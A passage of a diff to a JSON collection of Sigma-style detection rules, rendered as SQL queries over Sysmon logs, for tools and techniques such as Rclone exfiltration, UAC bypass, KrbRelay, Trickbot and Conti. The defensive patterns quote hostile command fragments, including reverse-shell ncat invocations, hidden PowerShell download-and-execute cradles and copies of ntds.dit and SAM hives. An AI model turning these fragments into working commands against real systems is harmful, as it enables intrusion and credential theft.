'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND 
CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, 
CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine 
LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": 
"proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine 
LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND 
CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": 
"proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": 
"Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", 
"status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + 
